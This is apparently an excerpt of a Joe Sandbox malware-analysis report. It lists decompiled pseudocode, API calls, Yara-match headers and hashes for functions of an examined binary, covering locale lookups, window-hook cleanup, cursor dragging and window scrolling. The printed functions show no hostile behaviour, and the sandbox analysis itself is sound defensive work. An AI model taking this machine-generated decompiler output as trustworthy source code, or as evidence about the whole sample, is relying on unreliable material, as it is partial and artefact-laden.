				 *[fs:eax] = _t26;
				_push(E0040CC8A);
				return E004049C0( &_v8);
			}










                                                    0x0040cbec
                                                    0x0040cbef
                                                    0x0040cbf4
                                                    0x0040cbf5
                                                    0x0040cbfa
                                                    0x0040cbfd
                                                    0x0040cc13
                                                    0x0040cc25
                                                    0x0040cc2f
                                                    0x0040cc3f
                                                    0x0040cc44
                                                    0x0040cc49
                                                    0x0040cc4e
                                                    0x0040cc4e
                                                    0x0040cc54
                                                    0x0040cc57
                                                    0x0040cc57
                                                    0x0040cc68
                                                    0x0040cc68
                                                    0x0040cc6f
                                                    0x0040cc72
                                                    0x0040cc75
                                                    0x0040cc82

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                    • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,00000004), ref: 0040CC3F
                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                    • EnumCalendarInfoA.KERNEL32(Function_0000CB74,00000000,00000000,00000003), ref: 0040CC68
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                    • String ID:
                                                    • API String ID: 4102113445-0
                                                    • Opcode ID: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                    • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                    • Opcode Fuzzy Hash: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                    • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458FB8 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00458FB8() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x49ebd0 != 0) {
					_t10 =  *0x49ebd0; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x49ebd0 = 0;
				if( *0x49ebd4 != 0) {
					_t2 =  *0x49ebcc; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x49ebc8) {
						_t8 =  *0x49ebd4; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x49ebd4; // 0x0
					CloseHandle(_t5);
					 *0x49ebd4 = 0;
					return 0;
				}
				return 0;
			}







                                                    0x00458fbf
                                                    0x00458fc1
                                                    0x00458fc7
                                                    0x00458fc7
                                                    0x00458fce
                                                    0x00458fda
                                                    0x00458fdc
                                                    0x00458fe2
                                                    0x00458ff2
                                                    0x00458ff6
                                                    0x00458ffc
                                                    0x00458ffc
                                                    0x00459001
                                                    0x00459007
                                                    0x0045900e
                                                    0x00000000
                                                    0x0045900e
                                                    0x00459013

                                                    APIs
                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                    • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                    • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                    • String ID:
                                                    • API String ID: 2429646606-0
                                                    • Opcode ID: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                    • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                    • Opcode Fuzzy Hash: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                    • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040CC9C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E0040CC9C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40ce66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E004049C0(__edx);
				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
				if(E00409664(0x40ce7c, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404C80(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x49b134], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40ce80);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E0040A0C8(_t124 + _t92 - 1, 4, 0x40ce90);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40cea8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404C88(_t122, 0x40cec0);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404BA8();
												E00404C88(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404C88(_t122, 0x40ceb4);
										_t92 = _t92 + 1;
									}
								} else {
									E00404C88(_t122, 0x40cea0);
									_t92 = _t92 + 3;
								}
							} else {
								E00404C88(_t122, 0x40ce8c);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040DD78(_t124, _t92);
							E00404EE0(_t124, _v8, _t92,  &_v20);
							E00404C88(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x49e748; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404A14(_t122, _t124);
					} else {
						while(_t92 <= E00404C80(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404BA8();
									E00404C88(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040CE6D);
				return E004049E4( &_v24, 4);
			}























                                                    0x0040cc9c
                                                    0x0040cca1
                                                    0x0040cca2
                                                    0x0040cca3
                                                    0x0040cca4
                                                    0x0040cca5
                                                    0x0040cca9
                                                    0x0040ccab
                                                    0x0040ccaf
                                                    0x0040ccb0
                                                    0x0040ccb5
                                                    0x0040ccb8
                                                    0x0040ccbb
                                                    0x0040ccc2
                                                    0x0040ccda
                                                    0x0040ccf2
                                                    0x0040ce3c
                                                    0x0040ce3e
                                                    0x0040ce43
                                                    0x0040ce45
                                                    0x00000000
                                                    0x00000000
                                                    0x0040cd5b
                                                    0x0040cd60
                                                    0x0040cd67
                                                    0x0040cda5
                                                    0x0040cdaa
                                                    0x0040cdac
                                                    0x0040cdcb
                                                    0x0040cdd0
                                                    0x0040cdd2
                                                    0x0040cdf3
                                                    0x0040cdf8
                                                    0x0040cdfa
                                                    0x0040ce0f
                                                    0x0040ce0f
                                                    0x0040ce11
                                                    0x0040ce17
                                                    0x0040ce1e
                                                    0x0040ce13
                                                    0x0040ce13
                                                    0x0040ce15
                                                    0x0040ce2c
                                                    0x0040ce36
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040ce15
                                                    0x0040cdfc
                                                    0x0040ce03
                                                    0x0040ce08
                                                    0x0040ce08
                                                    0x0040cdd4
                                                    0x0040cddb
                                                    0x0040cde0
                                                    0x0040cde0
                                                    0x0040cdae
                                                    0x0040cdb5
                                                    0x0040cdba
                                                    0x0040cdba
                                                    0x0040ce3b
                                                    0x0040ce3b
                                                    0x0040cd69
                                                    0x0040cd72
                                                    0x0040cd80
                                                    0x0040cd8a
                                                    0x0040cd8f
                                                    0x0040cd8f
                                                    0x0040cd67
                                                    0x0040ccf8
                                                    0x0040ccf8
                                                    0x0040ccfd
                                                    0x0040cd00
                                                    0x0040cd0e
                                                    0x0040cd0a
                                                    0x0040cd0a
                                                    0x0040cd0a
                                                    0x0040cd12
                                                    0x0040cd4d
                                                    0x0040cd14
                                                    0x0040cd39
                                                    0x0040cd1a
                                                    0x0040cd1a
                                                    0x0040cd1c
                                                    0x0040cd1e
                                                    0x0040cd20
                                                    0x0040cd29
                                                    0x0040cd33
                                                    0x0040cd33
                                                    0x0040cd20
                                                    0x0040cd38
                                                    0x0040cd38
                                                    0x0040cd38
                                                    0x0040cd44
                                                    0x0040cd12
                                                    0x0040ce4b
                                                    0x0040ce4d
                                                    0x0040ce50
                                                    0x0040ce53
                                                    0x0040ce65

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: eeee$ggg$yyyy
                                                    • API String ID: 4232894706-1253427255
                                                    • Opcode ID: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                    • Instruction ID: 4a597fd56ac0f87983323c6834d704910f88c0d9acca8889b228a53315074fe8
                                                    • Opcode Fuzzy Hash: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                    • Instruction Fuzzy Hash: 0541E5B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C5D63CED0782AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004392CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E004392CC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x49eb34 = __eax;
				_push(_t133);
				_push(0x439471);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x49eb3c = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E00403DE8(__eax, __eflags);
					__eflags =  *0x49eb34;
					if( *0x49eb34 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E00438690(1, _t124);
							 *0x49eb3c = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x437498; // 0x4374e4
						_t54 = E00403D78( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E004197DC(0,  &_v36, 0, _t124, _t129);
								E0043AA94(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								_t130 = _v12;
								_t125 =  *((intOrPtr*)(_v12 + 0x38));
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E004197DC( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x437498; // 0x4374e4
							_t71 = E00403D78(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E00441704(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E0043915C(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E00403DE8(__eax, _t135);
				if( *0x49eb34 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E00438578(_t124, 1);
						 *0x49eb3c = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}




























                                                    0x004392cc
                                                    0x004392d5
                                                    0x004392d8
                                                    0x004392da
                                                    0x004392dc
                                                    0x004392e4
                                                    0x004392e5
                                                    0x004392ea
                                                    0x004392ed
                                                    0x004392f2
                                                    0x004392f5
                                                    0x004392fc
                                                    0x00439303
                                                    0x00439359
                                                    0x0043935e
                                                    0x00439365
                                                    0x00439374
                                                    0x00439378
                                                    0x00439388
                                                    0x0043938b
                                                    0x0043938b
                                                    0x00439395
                                                    0x0043939a
                                                    0x004393a0
                                                    0x004393a5
                                                    0x004393a7
                                                    0x004393c5
                                                    0x004393c8
                                                    0x004393cc
                                                    0x004393f9
                                                    0x004393fe
                                                    0x00439400
                                                    0x0043940d
                                                    0x00439412
                                                    0x00439418
                                                    0x0043941e
                                                    0x00439421
                                                    0x00439421
                                                    0x0043942a
                                                    0x00439433
                                                    0x00439439
                                                    0x0043943e
                                                    0x00439444
                                                    0x0043944a
                                                    0x00000000
                                                    0x0043944a
                                                    0x004393d0
                                                    0x004393d6
                                                    0x004393db
                                                    0x004393dd
                                                    0x00000000
                                                    0x00000000
                                                    0x004393e3
                                                    0x004393e8
                                                    0x004393ee
                                                    0x004393f4
                                                    0x00000000
                                                    0x004393a9
                                                    0x004393b8
                                                    0x0043944d
                                                    0x00439456
                                                    0x00439457
                                                    0x00439458
                                                    0x00439459
                                                    0x0043945a
                                                    0x00439462
                                                    0x00439469
                                                    0x0043946c
                                                    0x00000000
                                                    0x0043946c
                                                    0x004393a7
                                                    0x00439369
                                                    0x0043936c
                                                    0x00000000
                                                    0x0043936c
                                                    0x0043930e
                                                    0x0043931a
                                                    0x00439329
                                                    0x0043932d
                                                    0x00439341
                                                    0x00439344
                                                    0x00439344
                                                    0x00000000
                                                    0x0043932d
                                                    0x0043931e
                                                    0x00439321
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \`C$tC
                                                    • API String ID: 0-3452953066
                                                    • Opcode ID: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                    • Instruction ID: 1d99dae1233738e974a732b918af4f5548ca7b3dae0a6c744bb57b2c2fe5a1b7
                                                    • Opcode Fuzzy Hash: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                    • Instruction Fuzzy Hash: 0F519170A046059FCB00DF9AD481A9EBBF5FF9C314F10906BE805A7361D779AD81CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043915C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E0043915C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				struct HWND__* _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t87;

				_t87 = __fp0;
				_t80 = _t79 + 0xfffffff8;
				_t70 = __ecx;
				_t45 = __edx;
				_t77 = __eax;
				 *0x49eb38 = __eax;
				_t24 =  *0x49eb38; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x49eb44);
				_t26 =  *0x49eb38; // 0x0
				_t58 = 0x49eb44->x; // 0x0
				 *(_t26 + 0xc) = _t58;
				_t59 =  *0x49eb48; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
				 *0x49eb4c = GetCursor();
				_t28 =  *0x49eb38; // 0x0
				 *0x49eb40 = E00438388(_t28);
				 *0x49eb50 = _t70;
				_t60 =  *0x4360a0; // 0x4360ec
				if(E00403D78(_t77, _t60) == 0) {
					__eflags = _t45;
					if(__eflags == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 1;
					}
				} else {
					_t65 = _t77;
					_t4 = _t65 + 0x44; // 0x44
					_t41 = _t4;
					_t49 =  *_t41;
					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t65 + 0x20)) = 0;
						 *((intOrPtr*)(_t65 + 0x24)) = 0;
					} else {
						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t65 + 0x20)) = __fp0;
						asm("wait");
					}
					_t66 =  *((intOrPtr*)(_t41 + 4));
					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t77 + 0x28)) = 0;
						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
					} else {
						_t53 = _t77;
						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t53 + 0x28)) = _t87;
						asm("wait");
					}
					if(_t45 == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 2;
						 *((intOrPtr*)( *_t77 + 0x30))();
					}
				}
				_t32 =  *0x49eb38; // 0x0
				 *0x49eb58 =  *((intOrPtr*)( *_t32 + 8))();
				_t85 =  *0x49eb58;
				if( *0x49eb58 != 0) {
					_t37 =  *0x49eb48; // 0x0
					_t38 = GetDesktopWindow();
					_t39 =  *0x49eb58; // 0x0
					E00443038(_t39, _t38, _t85, _t37);
				}
				_t35 = E00403BBC(1);
				 *0x49eb60 = _t35;
				if( *0x49eb54 != 0) {
					_t35 = E00438E8C(0x49eb44, 1);
				}
				return _t35;
			}


























                                                    0x0043915c
                                                    0x0043915f
                                                    0x00439162
                                                    0x00439164
                                                    0x00439166
                                                    0x00439168
                                                    0x0043916e
                                                    0x00439175
                                                    0x0043917d
                                                    0x00439182
                                                    0x00439187
                                                    0x0043918d
                                                    0x00439190
                                                    0x00439196
                                                    0x0043919e
                                                    0x004391a3
                                                    0x004391ad
                                                    0x004391b2
                                                    0x004391ba
                                                    0x004391c7
                                                    0x00439259
                                                    0x0043925b
                                                    0x00439266
                                                    0x0043925d
                                                    0x0043925d
                                                    0x0043925d
                                                    0x004391cd
                                                    0x004391cd
                                                    0x004391cf
                                                    0x004391cf
                                                    0x004391d5
                                                    0x004391db
                                                    0x004391fd
                                                    0x004391ff
                                                    0x00439202
                                                    0x004391dd
                                                    0x004391e2
                                                    0x004391e5
                                                    0x004391ed
                                                    0x004391f1
                                                    0x004391f5
                                                    0x004391f7
                                                    0x004391fa
                                                    0x004391fa
                                                    0x00439208
                                                    0x0043920f
                                                    0x00439234
                                                    0x00439236
                                                    0x00439239
                                                    0x00439211
                                                    0x00439211
                                                    0x00439218
                                                    0x0043921b
                                                    0x00439224
                                                    0x00439228
                                                    0x0043922c
                                                    0x0043922e
                                                    0x00439231
                                                    0x00439231
                                                    0x0043923e
                                                    0x00439250
                                                    0x00439240
                                                    0x00439240
                                                    0x0043924b
                                                    0x0043924b
                                                    0x0043923e
                                                    0x0043926d
                                                    0x00439277
                                                    0x0043927c
                                                    0x00439283
                                                    0x00439285
                                                    0x0043928b
                                                    0x00439298
                                                    0x0043929d
                                                    0x0043929d
                                                    0x004392a9
                                                    0x004392ae
                                                    0x004392ba
                                                    0x004392c1
                                                    0x004392c1
                                                    0x004392cb

                                                    APIs
                                                    • GetCursorPos.USER32(0049EB44), ref: 0043917D
                                                    • GetCursor.USER32(0049EB44), ref: 00439199
                                                      • Part of subcall function 00438388: SetCapture.USER32(00000000,?,004391AD,0049EB44), ref: 00438397
                                                    • GetDesktopWindow.USER32 ref: 0043928B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cursor$CaptureDesktopWindow
                                                    • String ID: `C
                                                    • API String ID: 669539147-1847193361
                                                    • Opcode ID: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                    • Instruction ID: c6ff30aa0831a605475be7d7daa41799f87f77b36a22a6f0c8b6adc85e5341f0
                                                    • Opcode Fuzzy Hash: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                    • Instruction Fuzzy Hash: D441BE716096009FD304DF2ED948616BBE1FB88310F1989BFE44A8B3A1DB75EC41CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004412BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004412BC(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E0043E434(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E0043DFC4();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E0043E3F8(_t54, _t58);
						_t47 =  *0x437498; // 0x4374e4
						if(E00403D78(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}












                                                    0x004412c3
                                                    0x004412c7
                                                    0x004412ca
                                                    0x004412cc
                                                    0x004412d4
                                                    0x004412e0
                                                    0x004412e4
                                                    0x004412e4
                                                    0x004412e4
                                                    0x004412e6
                                                    0x004412ef
                                                    0x00441306
                                                    0x00441306
                                                    0x00441314
                                                    0x00441317
                                                    0x00441385
                                                    0x00441393
                                                    0x00441319
                                                    0x00441319
                                                    0x0044131a
                                                    0x0044131c
                                                    0x00441325
                                                    0x00441329
                                                    0x00441336
                                                    0x00441344
                                                    0x0044134b
                                                    0x00441350
                                                    0x00441355
                                                    0x0044137c
                                                    0x0044137c
                                                    0x00441355
                                                    0x00441381
                                                    0x00441382
                                                    0x00441382
                                                    0x00000000
                                                    0x0044131c

                                                    APIs
                                                    • IsWindowVisible.USER32 ref: 004412D7
                                                    • ScrollWindow.USER32 ref: 00441306
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044137C
